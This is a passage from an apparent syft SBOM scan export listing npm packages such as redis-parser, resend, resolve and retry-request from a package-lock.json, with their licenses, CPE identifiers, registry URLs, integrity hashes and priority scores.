priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0c07927a54487fe7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: redis-errors 1.2.0'
|
|
title: redis-errors 1.2.0
|
|
description: 'Package discovered: redis-errors 1.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c6c6f81fb8ed6f43
|
|
name: redis-errors
|
|
version: 1.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:redis-errors:redis-errors:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis-errors:redis_errors:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis_errors:redis-errors:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis_errors:redis_errors:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis:redis-errors:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis:redis_errors:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/redis-errors@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/redis-errors/-/redis-errors-1.2.0.tgz
|
|
integrity: sha512-1qny3OExCf0UvUV/5wpYKf2YwPcOqXzkwKKSmKHiE6ZMQs5heeE/c8eXK+PNllPvmjgAbfnsbpkGZWy8cBpn9w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 38d5b601f3f165a4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: redis-parser 3.0.0'
|
|
title: redis-parser 3.0.0
|
|
description: 'Package discovered: redis-parser 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d5b8e01dbe4fdde4
|
|
name: redis-parser
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:redis-parser:redis-parser:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis-parser:redis_parser:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis_parser:redis-parser:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis_parser:redis_parser:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis:redis-parser:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:redis:redis_parser:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/redis-parser@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/redis-parser/-/redis-parser-3.0.0.tgz
|
|
integrity: sha512-DJnGAeenTdpMEH6uAJRK/uiyEIH9WVsUmoLwzudwGJUwZPp80PDBWPHXSAGNPwNvIXAbe7MSUB1zQFugFml66A==
|
|
dependencies:
|
|
redis-errors: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 73e41b20b413651d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: rentaldrivego 1.0.0'
|
|
title: rentaldrivego 1.0.0
|
|
description: 'Package discovered: rentaldrivego 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 784a87ea0f6f2516
|
|
name: rentaldrivego
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:rentaldrivego:rentaldrivego:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/rentaldrivego@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7ebb1ff31601df05
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: require-directory 2.1.1'
|
|
title: require-directory 2.1.1
|
|
description: 'Package discovered: require-directory 2.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ae03eb850b2a6844
|
|
name: require-directory
|
|
version: 2.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:require-directory:require-directory:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-directory:require_directory:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_directory:require-directory:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_directory:require_directory:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require:require-directory:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require:require_directory:2.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/require-directory@2.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz
|
|
integrity: sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ae7e8898d2f0d0c8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: require-from-string 2.0.2'
|
|
title: require-from-string 2.0.2
|
|
description: 'Package discovered: require-from-string 2.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f7f7aa302949d36c
|
|
name: require-from-string
|
|
version: 2.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:require-from-string:require-from-string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-from-string:require_from_string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_from_string:require-from-string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_from_string:require_from_string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-from:require-from-string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-from:require_from_string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_from:require-from-string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_from:require_from_string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require:require-from-string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require:require_from_string:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/require-from-string@2.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz
|
|
integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2d09a802d546535f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: require-main-filename 2.0.0'
|
|
title: require-main-filename 2.0.0
|
|
description: 'Package discovered: require-main-filename 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 791f53dc42a97604
|
|
name: require-main-filename
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:require-main-filename:require-main-filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-main-filename:require_main_filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_main_filename:require-main-filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_main_filename:require_main_filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-main:require-main-filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require-main:require_main_filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_main:require-main-filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require_main:require_main_filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require:require-main-filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:require:require_main_filename:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/require-main-filename@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz
|
|
integrity: sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b3700e9b1b03966b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: resend 3.5.0'
|
|
title: resend 3.5.0
|
|
description: 'Package discovered: resend 3.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c52cdc280efaa4d0
|
|
name: resend
|
|
version: 3.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:resend:resend:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/resend@3.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/resend/-/resend-3.5.0.tgz
|
|
integrity: sha512-bKu4LhXSecP6krvhfDzyDESApYdNfjirD5kykkT1xO0Cj9TKSiGh5Void4pGTs3Am+inSnp4dg0B5XzdwHBJOQ==
|
|
dependencies:
|
|
'@react-email/render': 0.0.16
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7be6d0329d7fce71
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: resolve 1.22.12'
|
|
title: resolve 1.22.12
|
|
description: 'Package discovered: resolve 1.22.12'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2e445c7ed78482c1
|
|
name: resolve
|
|
version: 1.22.12
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:resolve:resolve:1.22.12:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/resolve@1.22.12
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/resolve/-/resolve-1.22.12.tgz
|
|
integrity: sha512-TyeJ1zif53BPfHootBGwPRYT1RUt6oGWsaQr8UyZW/eAm9bKoijtvruSDEmZHm92CwS9nj7/fWttqPCgzep8CA==
|
|
dependencies:
|
|
es-errors: ^1.3.0
|
|
is-core-module: ^2.16.1
|
|
path-parse: ^1.0.7
|
|
supports-preserve-symlinks-flag: ^1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3f98609d8855980b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: restructure 3.0.2'
|
|
title: restructure 3.0.2
|
|
description: 'Package discovered: restructure 3.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 05272d1e7e2ad4be
|
|
name: restructure
|
|
version: 3.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:restructure:restructure:3.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/restructure@3.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/restructure/-/restructure-3.0.2.tgz
|
|
integrity: sha512-gSfoiOEA0VPE6Tukkrr7I0RBdE0s7H1eFCDBk05l1KIQT1UIKNc5JZy6jdyW6eYH3aR3g5b3PuL77rq0hvwtAw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b7f5c38e4c9ed33f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: retry 0.13.1'
|
|
title: retry 0.13.1
|
|
description: 'Package discovered: retry 0.13.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b8be0fab008ab183
|
|
name: retry
|
|
version: 0.13.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:retry:retry:0.13.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/retry@0.13.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/retry/-/retry-0.13.1.tgz
|
|
integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b8976a72aaa61b4d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: retry-request 7.0.2'
|
|
title: retry-request 7.0.2
|
|
description: 'Package discovered: retry-request 7.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 672814322994feff
|
|
name: retry-request
|
|
version: 7.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:retry-request:retry-request:7.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:retry-request:retry_request:7.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:retry_request:retry-request:7.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:retry_request:retry_request:7.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:retry:retry-request:7.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:retry:retry_request:7.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/retry-request@7.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz
|
|
integrity: sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==
|
|
dependencies:
|
|
'@types/request': ^2.48.8
|
|
extend: ^3.0.2
|
|
teeny-request: ^9.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0d600ce535ab6bd3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: reusify 1.1.0'
|
|
title: reusify 1.1.0
|
|
description: 'Package discovered: reusify 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 456353a253e18966
|
|
name: reusify
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:reusify:reusify:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/reusify@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz
|
|
integrity: sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3a557f6b562fa305
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
